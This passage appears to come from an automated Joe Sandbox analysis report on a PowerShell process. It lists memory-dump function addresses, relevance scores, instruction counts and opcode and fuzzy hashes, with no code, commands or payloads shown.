                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a5714877130ba490db77cfba4574261e9a70cd10068634631261ed474498abab
                                                                            • Instruction ID: 1f2984d0d2d6a29cddb59764a6f09e148c72ba56f3f408484bb8356ebaff949e
                                                                            • Opcode Fuzzy Hash: a5714877130ba490db77cfba4574261e9a70cd10068634631261ed474498abab
                                                                            • Instruction Fuzzy Hash: B951B1357042059FD715DBB9D884A2A7BEAFFC9316B1884AAE509CB352DB35DC01CBA0
                                                                            Function 033ABAC0 Relevance: .2, Instructions: 155COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f51825a687c7553598ab6d1ba8806c8bbc9a488e789b210ea8ebe02348146e17
                                                                            • Instruction ID: 0d182f68f56693f15f0a69bab843df16ce59f7338a7890e4265493c23384714b
                                                                            • Opcode Fuzzy Hash: f51825a687c7553598ab6d1ba8806c8bbc9a488e789b210ea8ebe02348146e17
                                                                            • Instruction Fuzzy Hash: 4E610775E006489FCB14DFADD984A9DFBF5EF88310F298129E809AB255EB349D41CB60
                                                                            Function 033ABAB4 Relevance: .2, Instructions: 152COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 851d0dcddf895b3be2bd4c55f291a01ba3d3d9764d2f2526a2797957c3fa5b69
                                                                            • Instruction ID: faaf592dced4146b9a02c94565908b60f6009ce86c3d3a713599f2f1d0f09b6e
                                                                            • Opcode Fuzzy Hash: 851d0dcddf895b3be2bd4c55f291a01ba3d3d9764d2f2526a2797957c3fa5b69
                                                                            • Instruction Fuzzy Hash: 20510675E00648DFCB14DFADD984A8DFBF6EF88310F188169E809AB365DB349845CB60
                                                                            Function 07963CCC Relevance: .1, Instructions: 123COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2115762177.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7960000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: faf801906b1a8199dd668763ec595e4e9bc1bbb646982e5a64dcafef393e77f8
                                                                            • Instruction ID: 4040f2d92b1888c7665a8579a84ac604599a4fbe5e5d6d6446e53548e231114e
                                                                            • Opcode Fuzzy Hash: faf801906b1a8199dd668763ec595e4e9bc1bbb646982e5a64dcafef393e77f8
                                                                            • Instruction Fuzzy Hash: 42417BF5B00202DFCB228F28C61976BBBA69F85308F0486A6DD019F252DB35DD45C7B1
                                                                            Function 033A2B00 Relevance: .1, Instructions: 106COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d906e5d9cd27c72bb56f2803647b50838ecc4e7de35939263e6361fc029b45fb
                                                                            • Instruction ID: 0a7734ce0ea23a7ae6fbc6df557cf8bff789c08a6f6631b00d0eb0497718b490
                                                                            • Opcode Fuzzy Hash: d906e5d9cd27c72bb56f2803647b50838ecc4e7de35939263e6361fc029b45fb
                                                                            • Instruction Fuzzy Hash: 514129B4A005058FCB09CF5CC5D89AEFBB1FF48310B298699D856AB364C732EC51CBA0
                                                                            Function 033AC388 Relevance: .1, Instructions: 101COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5a3a4496814ebb56dbf893d7ab7dbd17798fdc09fa2cb98fab71c5608ebee662
                                                                            • Instruction ID: 976b8bb621a6d57c953d1c0aeef3e826666be07403fde7eca516d3bb85298f3f
                                                                            • Opcode Fuzzy Hash: 5a3a4496814ebb56dbf893d7ab7dbd17798fdc09fa2cb98fab71c5608ebee662
                                                                            • Instruction Fuzzy Hash: 66319C35300A009FCB06EB7CE884B9AB7A6EFC5211F148639E50ACB755DF75A845CBA1
                                                                            Function 033A6FD1 Relevance: .1, Instructions: 95COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cd3e70a91ec3daf1e6b2ad4b9c3b5a439f33a7cd319e116cc6b46663b7a80085
                                                                            • Instruction ID: d83e09db7177755c277b095c77082b7ef422581f3cfde5a89beea9d7ee3125b4
                                                                            • Opcode Fuzzy Hash: cd3e70a91ec3daf1e6b2ad4b9c3b5a439f33a7cd319e116cc6b46663b7a80085
                                                                            • Instruction Fuzzy Hash: 61312A34A046058FCB14DFA8C9D8AAEBBF5EF8D315F1880A8E402AB355DB75DC41DB60
                                                                            Function 033A2C5C Relevance: .1, Instructions: 94COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a40d8ebfeb362ef531def6121406c1b57c719875c34eb376b51a8304b70db3b9
                                                                            • Instruction ID: 6e9e12a60a206af7a2a228435a353626a37dbe8684d08e742d76e96c3e3403a7
                                                                            • Opcode Fuzzy Hash: a40d8ebfeb362ef531def6121406c1b57c719875c34eb376b51a8304b70db3b9
                                                                            • Instruction Fuzzy Hash: 5231F5319096928FC717DB6CDCA46EABF70EF06320F0945E2C4A4DF5A3C7269816CB61
                                                                            Function 033AAE60 Relevance: .1, Instructions: 93COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d3a072f04dbaf174946e942a09ac37479a78b69e18451b53d916853cc831bb23
                                                                            • Instruction ID: c4945c83389a44ac48857db99539c8174d4872eb88e6cf1516f21674ff072bf6
                                                                            • Opcode Fuzzy Hash: d3a072f04dbaf174946e942a09ac37479a78b69e18451b53d916853cc831bb23
                                                                            • Instruction Fuzzy Hash: 5B316F75E006098BCB08DF7DD894AAEBBF6EF89311F148169E405EB754EB349C41CBA1
                                                                            Function 033AAD28 Relevance: .1, Instructions: 88COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e5af3401296f53be0616ba807a5ff27e8a70e8b4eeada5ca91a839fa622955e4
                                                                            • Instruction ID: c04f414b4587ddc52114f4d29d0c6a698cfa9e611c0b8051e1e4acd6bd8acf9b
                                                                            • Opcode Fuzzy Hash: e5af3401296f53be0616ba807a5ff27e8a70e8b4eeada5ca91a839fa622955e4
                                                                            • Instruction Fuzzy Hash: 40319278E047099FDB05DB68D894AAEBBB2EFC5301F11C4A9D111AF3A5DA389D40CB64
                                                                            Function 033AAE70 Relevance: .1, Instructions: 84COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9b2ee45763dc852f1900cefdba41785e70547a488888bbeecc794c35ef6d89d5
                                                                            • Instruction ID: 6be7857a0fc3dbf04fa458ba65d4e9aedcb2f4c1365ad26b465682945483bd3c
                                                                            • Opcode Fuzzy Hash: 9b2ee45763dc852f1900cefdba41785e70547a488888bbeecc794c35ef6d89d5
                                                                            • Instruction Fuzzy Hash: 6B313875E006098BDB08DF6DC894BAEBBF6EF88310F148069E405EB754EB348C41CBA1
                                                                            Function 033A93F0 Relevance: .1, Instructions: 79COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8ad1abad7159ac1c246a646ea8dbeb592100a9dbf433d739188ddbe7e20ca4c1
                                                                            • Instruction ID: e0ebb373393b46859aa971a894697b3168bcb22b0effb2c3565f209548cee0dc
                                                                            • Opcode Fuzzy Hash: 8ad1abad7159ac1c246a646ea8dbeb592100a9dbf433d739188ddbe7e20ca4c1
                                                                            • Instruction Fuzzy Hash: B4317E759057888EDB60CF6EC4C878AFFE6EF89320F28C49DD449AB206C7759485CB61
                                                                            Function 033AAD38 Relevance: .1, Instructions: 77COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fe4e44a4ec6e36ffe26065b0e31f10942bb524f57b242e0c79f73c606af03ae0
                                                                            • Instruction ID: 8819fa3ab4a322d44045e039af033a6849c5c9d8f0006e5a9696198f869d9757
                                                                            • Opcode Fuzzy Hash: fe4e44a4ec6e36ffe26065b0e31f10942bb524f57b242e0c79f73c606af03ae0
                                                                            • Instruction Fuzzy Hash: C63173B8E002099FDB04DFA4D894AAE77B2EFC5301F11C469D511AF395DB399D418F64
                                                                            Function 0333F3D8 Relevance: .1, Instructions: 76COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105156927.000000000333D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0333D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_333d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1d843523c5909f9365182db61058396fb3c5736c30236e1826f32208fe9b6ce0
                                                                            • Instruction ID: cf93fd6f30f986b2510bc4c3a6ae4dda122b5f02fd270a36f5bfeec15a40c97e
                                                                            • Opcode Fuzzy Hash: 1d843523c5909f9365182db61058396fb3c5736c30236e1826f32208fe9b6ce0
                                                                            • Instruction Fuzzy Hash: 4721F476908200EFCB05CF54D9C0B26BB69FB89314F64C5ADE9090A256C33AD896CBA1
                                                                            Function 0333F02C Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105156927.000000000333D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0333D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_333d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1dfb7aa55a22b7f5922b3f907c64fbaa20f5cd9b3b9505cb981ab9210a8b763c
                                                                            • Instruction ID: aefd1d0998af9c9a2f42cb8568071e55a984eb9699d613539a6a171ae13b1a29
                                                                            • Opcode Fuzzy Hash: 1dfb7aa55a22b7f5922b3f907c64fbaa20f5cd9b3b9505cb981ab9210a8b763c
                                                                            • Instruction Fuzzy Hash: 42214975904200DFCB11CF28D9C0B26BF69FB85324F64C5ADD8094B246C33ED846CB61
                                                                            Function 033A9400 Relevance: .1, Instructions: 69COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ec78497bba1778a1c3972d63fcaba5c318d4ae5dffae3ed0fe486416158e5adc
                                                                            • Instruction ID: 876cc2db7814c778b870f2808144bec49589b5ce7ee7fedf892e4018ecff892e
                                                                            • Opcode Fuzzy Hash: ec78497bba1778a1c3972d63fcaba5c318d4ae5dffae3ed0fe486416158e5adc
                                                                            • Instruction Fuzzy Hash: 73217A75905B488FDB60CF6EC48838AFBF6EF88320F28C45ED80DAB245C77464818B61
                                                                            Function 033A767C Relevance: .1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 66dcc89ed1d42c7d5f5453fe9ef9de6468d21a76ad3c055b355ca5eef2ac95cb
                                                                            • Instruction ID: 9e79432f06556f12e4a2baf2f6400152f2e4312c188131530efcef030e78321e
                                                                            • Opcode Fuzzy Hash: 66dcc89ed1d42c7d5f5453fe9ef9de6468d21a76ad3c055b355ca5eef2ac95cb
                                                                            • Instruction Fuzzy Hash: 9611FE79B001188FCB04DBADD884AED77F6EFC8225B0440A5E509DB355DB35DD158B90
                                                                            Function 079628E8 Relevance: .1, Instructions: 58COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2115762177.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7960000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b46e8c7858a7f1ae5599feabf9aa3848f4a98ba27508d65c4119c2bee4ea06d9
                                                                            • Instruction ID: 119f7fbf264c1a66de0161d04ba742a19fd31cb53dc66a5b0037ca2c215a155b
                                                                            • Opcode Fuzzy Hash: b46e8c7858a7f1ae5599feabf9aa3848f4a98ba27508d65c4119c2bee4ea06d9
                                                                            • Instruction Fuzzy Hash: 0911C4B1A10206CFCB24DF58C689B66B7E9FB85329F148276E50887251E771D841CBA1
                                                                            Function 0333F3D3 Relevance: .1, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105156927.000000000333D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0333D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_333d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: eaff4d4d8c6e34b4058e19faa77ca919cd1e0f201f98fea8a2ce0d2c05b1599f
                                                                            • Instruction ID: f593de697b27aaf9f2dd6a855f2b20e4af858923ee5f6a51be6a0ca687c14d9a
                                                                            • Opcode Fuzzy Hash: eaff4d4d8c6e34b4058e19faa77ca919cd1e0f201f98fea8a2ce0d2c05b1599f
                                                                            • Instruction Fuzzy Hash: FB219D76908240DFCF06CF10D9C4B16BF72FB89314F28C5A9D9494A656C33AD8AACB91
                                                                            Function 0333F027 Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105156927.000000000333D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0333D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_333d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 830c0005bd04e393eb66fdf438895feacf4c0dff57886c80d0ed017cd194275d
                                                                            • Instruction ID: 736f076139e9c8778740676918eb1294f9da43fbaaa0cd8e8a42dfc1ccfd9a88
                                                                            • Opcode Fuzzy Hash: 830c0005bd04e393eb66fdf438895feacf4c0dff57886c80d0ed017cd194275d
                                                                            • Instruction Fuzzy Hash: 21119075904280DFDB15CF14D9C4B15FF61FB45324F28C6ADD8494B656C33AD44ACB51
                                                                            Function 033ABCE0 Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2ee7724fad3d48e48ec7f8f2edf8cbfe8738770e5b25d577260190c8db5d80e2
                                                                            • Instruction ID: 8b3f82987fe2b6dc19ca72fd0d189c9206ad6dd4abd75442515b55cb7048920d
                                                                            • Opcode Fuzzy Hash: 2ee7724fad3d48e48ec7f8f2edf8cbfe8738770e5b25d577260190c8db5d80e2
                                                                            • Instruction Fuzzy Hash: 8311A1316087448FDB14DF79D8D4A56BFE5EF45210F2888EEE08EC76A2DB21E845D700
                                                                            Function 033ADCD9 Relevance: .1, Instructions: 52COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6a193d41a471b89f71188ffb83a2ffa8ff5f5be412a36462639784a64ceb1b43
                                                                            • Instruction ID: d034db43c76c99d68fb294cb2a5ec13bef47fe20b3bf2260be8808d425af0381
                                                                            • Opcode Fuzzy Hash: 6a193d41a471b89f71188ffb83a2ffa8ff5f5be412a36462639784a64ceb1b43
                                                                            • Instruction Fuzzy Hash: 35012635A18584DFCB19C77CD8E49FCBFB6EFD8210B1884AAD4059BE26DA714C11CBA1
                                                                            Function 0333D006 Relevance: .0, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105156927.000000000333D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0333D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_333d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3e05e5609e78325eed534b87d4dd6003e6b72c653e18991991af27ab8236c2f9
                                                                            • Instruction ID: 3c8c0d26a4b231d024e07508019a2af5e2a75b283166d529f2ec533abc4dc54f
                                                                            • Opcode Fuzzy Hash: 3e05e5609e78325eed534b87d4dd6003e6b72c653e18991991af27ab8236c2f9
                                                                            • Instruction Fuzzy Hash: 7B01407240D3C09FD7128B258D94792BFA8EF53624F19C4DBE8848F1A7C6695C45C772
                                                                            Function 033A90D0 Relevance: .0, Instructions: 46COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f7a7a63d3bef8a112142a862f95883251645027a37485f080b86fba863009c1c
                                                                            • Instruction ID: bb6dd46aaec15018341fc2b5687d3bc0dc3693bc49f2cd1cf27a7758c30da2e1
                                                                            • Opcode Fuzzy Hash: f7a7a63d3bef8a112142a862f95883251645027a37485f080b86fba863009c1c
                                                                            • Instruction Fuzzy Hash: 3C012876A187444FD306DB2CC4983967F65DFC2210F14C1AFC1159F297CE395806C7A1
                                                                            Function 0333D01D Relevance: .0, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105156927.000000000333D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0333D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_333d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 06c775a297ddb63cdb0353c79a074264847127538af8abb52a4e319a778123c7
                                                                            • Instruction ID: 052b831513685e621aed03f230db570ae1aa8ba96b4bba1c4cd2cf5f3611bf00
                                                                            • Opcode Fuzzy Hash: 06c775a297ddb63cdb0353c79a074264847127538af8abb52a4e319a778123c7
                                                                            • Instruction Fuzzy Hash: 3A01F272404300AAE721CA29CDC4BA6FF9CEF42B30F1CC45AEC480A242C67D9941CAB1
                                                                            Function 033ABF10 Relevance: .0, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fe2fb14cc452cadc045ce36fbdcb6a59f4674829b83e34e961f2a62956e641be
                                                                            • Instruction ID: 48ed34ba0da310f61b07e34b2a629a756a97df6c5a90ace9ec32834d1549a72f
                                                                            • Opcode Fuzzy Hash: fe2fb14cc452cadc045ce36fbdcb6a59f4674829b83e34e961f2a62956e641be
                                                                            • Instruction Fuzzy Hash: 86F0C2367197A15FD7018AB99C909BBFFE9DF85251B0845ABF984C73A2CA70CD048B60
                                                                            Function 033A7958 Relevance: .0, Instructions: 40COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 80046d4e2a7ab6e9df992922e2b602b26d77797891cf4a487ab442c4f3eaa214
                                                                            • Instruction ID: 97713ad03d336400fe42f9a6243ddecebb3a21c9cfa9fe3400f0d07448a4b542
                                                                            • Opcode Fuzzy Hash: 80046d4e2a7ab6e9df992922e2b602b26d77797891cf4a487ab442c4f3eaa214
                                                                            • Instruction Fuzzy Hash: 3AF046363067409FC711876CD88496F7BE5EF8A231704059EE089CB362CE309C44C360
                                                                            Function 0333D9A7 Relevance: .0, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105156927.000000000333D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0333D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_333d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cbc73fe69e4f77017e5d4ac97edb6a942ccd002a0d73002ca7e6e3cc35ed45c8
                                                                            • Instruction ID: 36f111f45106b7743143f61ac42bc8a835e52d1e5c471918f45ba5a2a343badd
                                                                            • Opcode Fuzzy Hash: cbc73fe69e4f77017e5d4ac97edb6a942ccd002a0d73002ca7e6e3cc35ed45c8
                                                                            • Instruction Fuzzy Hash: 3EF0F976200600AFD760CF0ADD85C23FBADEBD5670719C55AE84A8B712C671EC41CBB0
                                                                            Function 033ADE38 Relevance: .0, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9ca1ba18255385cee9cd019cc8c8750d4996b1928363ed81851f24e6409af956
                                                                            • Instruction ID: f98e9455819d3227b5f06f5291d32a9e23da1eff5506938c55338338d10abfd3
                                                                            • Opcode Fuzzy Hash: 9ca1ba18255385cee9cd019cc8c8750d4996b1928363ed81851f24e6409af956
                                                                            • Instruction Fuzzy Hash: 16F082343046408FC300CB1DD8A4C76BBFAEFCA61571910E9E184CB736DA61DC01CB90
                                                                            Function 0333D998 Relevance: .0, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105156927.000000000333D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0333D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_333d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b3f786729304827c26b447373e28870b9d02e7fc67fa691757384f8a36782158
                                                                            • Instruction ID: 7523bd1bf01a3aef2da12692dd786fd709a1d2626127a848653a3570ae3e8f4e
                                                                            • Opcode Fuzzy Hash: b3f786729304827c26b447373e28870b9d02e7fc67fa691757384f8a36782158
                                                                            • Instruction Fuzzy Hash: 69F0F975100A40AFD765CF06CD85D23BBB9EB95620B19C489A84A8B722C631FC42CB60
                                                                            Function 033A9158 Relevance: .0, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9767f5df9ebabbdb660959d3582cdf7c5dec9340e51003c218755c4116100bf9
                                                                            • Instruction ID: 5456d49d36f75ac79f1c5c85f19aa9ba9d864edd6ff81f1f12559d4629f3eaa0
                                                                            • Opcode Fuzzy Hash: 9767f5df9ebabbdb660959d3582cdf7c5dec9340e51003c218755c4116100bf9
                                                                            • Instruction Fuzzy Hash: 31F09A399153084FD720CB7DD8AC39ABBA9EB02310F1884AAD25DD6292DB39A881C750
                                                                            Function 033A7968 Relevance: .0, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2105450647.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_33a0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
